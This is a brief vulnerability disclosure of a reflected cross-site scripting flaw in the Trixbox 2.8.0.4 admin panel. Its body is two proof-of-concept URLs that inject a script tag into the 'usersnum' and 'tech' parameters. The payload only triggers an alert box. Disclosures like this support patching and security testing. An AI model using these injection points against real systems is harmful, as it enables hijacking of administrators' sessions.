Trixbox 2.8.0.4 Cross Site Scripting

`Exploit Title: Trixbox 2.8.0.4 XSS Exploit  
Date: 07/04/2014  
Exploit Author: Daniel Moreno (a.k.a W1ckerMan)  
Vendor Homepage: http://sourceforge.net/projects/asteriskathome/  
Version: 2.8.0.4  
  
  
This exploit needs authentication  
  
http://IP/admin/config.php?display=recordings&usersnum=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E  
  
http://IP/admin/config.php?display=trunks&tech=%22%3E%3Cscript%3Ealert%28%22123%22%29%3C/script%3E  
  
  
Thanx,  
Daniel Henrique Negri Moreno (a.k.a W1ckerMan)  
`